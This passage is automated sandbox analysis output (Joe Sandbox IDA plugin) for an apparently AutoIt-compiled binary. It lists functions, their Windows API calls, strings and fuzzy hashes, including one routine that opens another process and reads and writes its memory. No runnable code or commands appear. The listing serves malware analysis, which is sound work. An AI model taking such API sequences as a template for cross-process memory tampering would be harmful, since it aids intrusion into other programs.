Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: db59edb9a23887861f21715e8b63c9a562bf7e467a113c23556ff968f28abd28
Instruction ID: b607f41fa8ff826ae115e78440605d8d5278b4b055bf1ced5aa83f7a30c5b84b
Opcode Fuzzy Hash: db59edb9a23887861f21715e8b63c9a562bf7e467a113c23556ff968f28abd28
Instruction Fuzzy Hash: 01012630804704ABEB305B60EC4EF9277B8FF04B02F000659F6C2A00E4CBF96848AB80

Function 00F913B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00F913BF
StrokeAndFillPath.GDI32(?,?,00FCB888,00000000,?), ref: 00F913DB
SelectObject.GDI32(?,00000000), ref: 00F913EE
DeleteObject.GDI32 ref: 00F91401
StrokePath.GDI32(?), ref: 00F9141C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: c7800124189484da339fd1838c6d81d2e3dcf2dfd492c18bb9615bc40a44bccc
Instruction ID: f279cb140a2c2e189289faeb24f1f61e3677be23d0386495713ece91af3fd0e7
Opcode Fuzzy Hash: c7800124189484da339fd1838c6d81d2e3dcf2dfd492c18bb9615bc40a44bccc
Instruction Fuzzy Hash: B6F0CD3000470A9BEF329F5AEC4C7693BA4B711326F188224F4AA591F8C73E4595DF50

Function 00FFC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00FFC432
CoCreateInstance.OLE32(01022D6C,00000000,00000001,01022BDC,?), ref: 00FFC44A

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

CoUninitialize.OLE32 ref: 00FFC6B7

Strings

.lnk, xrefs: 00FFC3C6, 00FFC3EE, 00FFC3F8

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 7d56e2b6a194bd1a50952d85b4b8a375ff8455e9e051fedf79d7a0e7dd563276
Instruction ID: 7ac144d5a96edbc3f48f9b6235d17f15d34b00fdfb151bd9e4fefb9ebc6921fd
Opcode Fuzzy Hash: 7d56e2b6a194bd1a50952d85b4b8a375ff8455e9e051fedf79d7a0e7dd563276
Instruction Fuzzy Hash: 89A14A71108305AFE700EF64CC91EABB7E8EF95354F00491DF1959B1A2EBB5EA09CB52

Function 00FA2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00FB0DB6: std::exception::exception.LIBCMT ref: 00FB0DEC
Part of subcall function 00FB0DB6: __CxxThrowException@8.LIBCMT ref: 00FB0E01

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00F97A51: _memmove.LIBCMT ref: 00F97AAB

__swprintf.LIBCMT ref: 00FA2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FA2D66

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 9a4bc64b5066525eea92d3e7a2a4ab3e8975e317feced4169938163aa295ec51
Instruction ID: 26c5652563a646f70c79f71628ca54d7d68943a4b06d84e14a2e78bed596e2bb
Opcode Fuzzy Hash: 9a4bc64b5066525eea92d3e7a2a4ab3e8975e317feced4169938163aa295ec51
Instruction Fuzzy Hash: 0C915C716183019FDB14EF28CC85D6FB7A9EF86720F04491EF4459B2A1EA28ED44EB52

Function 00FFB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F94743,?,?,00F937AE,?), ref: 00F94770

CoInitialize.OLE32(00000000), ref: 00FFB9BB
CoCreateInstance.OLE32(01022D6C,00000000,00000001,01022BDC,?), ref: 00FFB9D4
CoUninitialize.OLE32 ref: 00FFB9F1

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

Strings

.lnk, xrefs: 00FFB99D, 00FFB9AB

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 3769f265704a314e4343e6b5a5b5f43405be3b59376f15a4fb6c46aa3a8fbf0c
Instruction ID: 50144960c52d0bc0d9ca21530df43f71bbfedfca275065c7f3294b3b3c328a1b
Opcode Fuzzy Hash: 3769f265704a314e4343e6b5a5b5f43405be3b59376f15a4fb6c46aa3a8fbf0c
Instruction Fuzzy Hash: C0A143756043059FDB00EF14C884D2ABBE5BF89324F05898CF9999B3A2CB35EC45DB91

Function 00FB501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00FB50AD

Part of subcall function 00FC00F0: __87except.LIBCMT ref: 00FC012B

Strings

pow, xrefs: 00FB5085, 00FB50A2

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 29651584e2382272a19fc9cb383e548793ff8c5f94573ec458a3bcc00aaee473
Instruction ID: f497d003c88b553b0978bfda70aec35d0c37b03be51d92908eb98e1af8a81413
Opcode Fuzzy Hash: 29651584e2382272a19fc9cb383e548793ff8c5f94573ec458a3bcc00aaee473
Instruction Fuzzy Hash: 98517C71D08603C7DB217A29CA06BEE7B949B40B60F348D5CE4D586299DE3D8DC5BF82

Function 00FA6192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FA6248
_memmove.LIBCMT ref: 00FA62E4
_memset.LIBCMT ref: 00FA6308

Strings

ERCP, xrefs: 00FA61B3

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 66e7ebaff52cb296f7bc4b87b921c96c3dae80a7a1fddf426ba5ee4502d2ee18
Instruction ID: 5cdc74c2bd5bf5e74f92d550f720b8a8b0462165ddc03bfed9be04d693155c3c
Opcode Fuzzy Hash: 66e7ebaff52cb296f7bc4b87b921c96c3dae80a7a1fddf426ba5ee4502d2ee18
Instruction Fuzzy Hash: AE518EB1900305DBDB24DF65C881BAAB7E4EF49324F24457EE48ACB241EB74AA45EB50

Function 00FE97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FE9296,?,?,00000034,00000800,?,00000034), ref: 00FF14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FE983F

Part of subcall function 00FF1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FE92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00FF14B1

Part of subcall function 00FF13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00FF1409
Part of subcall function 00FF13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FE925A,00000034,?,?,00001004,00000000,00000000), ref: 00FF1419
Part of subcall function 00FF13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FE925A,00000034,?,?,00001004,00000000,00000000), ref: 00FF142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FE98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FE98F9

Strings

@, xrefs: 00FE9911

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 9182247d102a705fd69d4d03421416e765dda1037c817ca9b2cd67af2b189c37
Instruction ID: 5e1045f1ed42228030d2f1bad78b207e7dc980a239c70610d3e5353ed9a3f45d
Opcode Fuzzy Hash: 9182247d102a705fd69d4d03421416e765dda1037c817ca9b2cd67af2b189c37
Instruction Fuzzy Hash: CA41507690021CAFCB20DFA4CC41AEEBBB8EF49310F004059FA45B7151DA756E45DBA0

Function 01017946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0101F910,00000000,?,?,?,?), ref: 010179DF
GetWindowLongW.USER32 ref: 010179FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 01017A0C

Strings

SysTreeView32, xrefs: 010179B1

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: d46a4efe342c9bd6336e863fae408e5dcf203ea3241ff0f579c1969f461428f4
Instruction ID: 0f1bd3959649493f7ddc78733c1b38c573a8992b4e7398187f3cad85920b2bd2
Opcode Fuzzy Hash: d46a4efe342c9bd6336e863fae408e5dcf203ea3241ff0f579c1969f461428f4
Instruction Fuzzy Hash: 7C310132200206ABEF518E78CC41BEB7BA9FB48334F244725F9B5931E4D739E9548B50

Function 010173D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01017461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01017475
SendMessageW.USER32(?,00001002,00000000,?), ref: 01017499

Strings

SysMonthCal32, xrefs: 0101742C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 591e43544074f70f9ce3cfa18af8f54a854ceb1674cca0bca869b7cd1c3264f7
Instruction ID: d8240b7b61ea3d9b950a26ba9ce4046166d7e8db6f7816faef3b89655eefb098
Opcode Fuzzy Hash: 591e43544074f70f9ce3cfa18af8f54a854ceb1674cca0bca869b7cd1c3264f7
Instruction Fuzzy Hash: 8A21D332540219ABDF22CE64CC42FEA3BB9FF48724F110154FE956B194DB79A851DBE0

Function 01017B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01017C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01017C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01017C5F

Strings

msctls_updown32, xrefs: 01017BC4

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: b96a159432d4ed506a5d7c7097214abf67198bad5d2311f279351a6b111d102a
Instruction ID: b3fa9e434498607cbf9e101507737e52c62504050ce2ef0e5bebc2da33e3d1c9
Opcode Fuzzy Hash: b96a159432d4ed506a5d7c7097214abf67198bad5d2311f279351a6b111d102a
Instruction Fuzzy Hash: 0B214CB5600209AFEB11DF28DCC1DB737ECEB49394B140459FA859B355CB3AEC118BA0

Function 01016CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01016D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01016D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01016D70

Strings

Listbox, xrefs: 01016D08

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 49e744a99969598e3a7460a3f3df519e58c30317adaf3b2ea7a1ba4c0f851d50
Instruction ID: cc57626dc92f4b5024e523fe99183013a726a72081618a5f8096e44c98b843c5
Opcode Fuzzy Hash: 49e744a99969598e3a7460a3f3df519e58c30317adaf3b2ea7a1ba4c0f851d50
Instruction Fuzzy Hash: A6210732600118BFDF128F58DC40FBB3BBAFF89750F418128F9859B194C6BA9C5187A0

Function 0101770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01017772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01017787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01017794

Strings

msctls_trackbar32, xrefs: 01017749

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: c84f46b4d70a27d38525529d17ee46b7476d98368be5803473148351643ea816
Instruction ID: ec49b166257afa527bcfa4e61417ec1237775483aaf7e7c41ff6e4466c44c7b2
Opcode Fuzzy Hash: c84f46b4d70a27d38525529d17ee46b7476d98368be5803473148351643ea816
Instruction Fuzzy Hash: 1411E372240209BBEF209F65CC45FEB7BA9FF88B64F014528FA81A6090D676E411CB20

Function 00F94C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F94B83,?), ref: 00F94C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F94C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00F94C50
kernel32.dll, xrefs: 00F94C3F

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 925eefd4ad7f5c53398b630d742b8d7e4d4ff69f4d9c666424aef7589fb7c216
Instruction ID: d0f4e345907dcfffc4397ca30b1effc8902641feeded87fd63359c82193d3d63
Opcode Fuzzy Hash: 925eefd4ad7f5c53398b630d742b8d7e4d4ff69f4d9c666424aef7589fb7c216
Instruction Fuzzy Hash: D5D01270915713CFDB205F32D95861676D4AF16251B11883D94E5DA214E679D884C750

Function 01010DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,01011039), ref: 01010DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01010E07

Strings

advapi32.dll, xrefs: 01010DF0
RegDeleteKeyExW, xrefs: 01010E01

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: a18971c225a8004385d67298e13e4c82289b2096af808fc7071abf6eb8bffe53
Instruction ID: abcb7c7d5ae3d183d9d0a0f2fe0cdfc4c168045c02d50535c467151e423fd992
Opcode Fuzzy Hash: a18971c225a8004385d67298e13e4c82289b2096af808fc7071abf6eb8bffe53
Instruction Fuzzy Hash: EDD017B0610723CFD7209F7AC8486877AE5AF09256F218C7EA5C6D6108E6B9E4D0CB90

Function 00F94C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F94BD0,?,00F94DEF,?,010552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F94C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F94C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00F94C1D
kernel32.dll, xrefs: 00F94C0C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: bcfb65b94e091c88c6b5c8aebaebd5ffe07a7ea28d62b73e620a8418c0dcd852
Instruction ID: 9ee634088a8be7701e2a311bde0cb41ac9b56403f08e4f554bbca7d66e4e35cd
Opcode Fuzzy Hash: bcfb65b94e091c88c6b5c8aebaebd5ffe07a7ea28d62b73e620a8418c0dcd852
Instruction Fuzzy Hash: 80D01270911713CFDB205F71D968606B6D5EF19252B118C3D94C5D6214E6B8D885CB50

Function 010090E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,01008CF4,?,0101F910), ref: 010090EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01009100

Strings

GetModuleHandleExW, xrefs: 010090FA
kernel32.dll, xrefs: 010090E9

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 101376ce7403ce7d2dde2a22fb09534ce5fc4b2d05df32ab74de6c2242a01df5
Instruction ID: e6473c39a76f0fa1959e48761fc31cc664a5d88cbec43933def4d5869c8f9d4a
Opcode Fuzzy Hash: 101376ce7403ce7d2dde2a22fb09534ce5fc4b2d05df32ab74de6c2242a01df5
Instruction Fuzzy Hash: 60D0C730610713CFEB208F36D86824276E4AF02245F02CC3E94CACA181E6B8C4C0CB90

Function 00FD1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00FD1718
__swprintf.LIBCMT ref: 00FD1749

Strings

WIN_XPe, xrefs: 00FD1788
%.3d, xrefs: 00FD1723

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

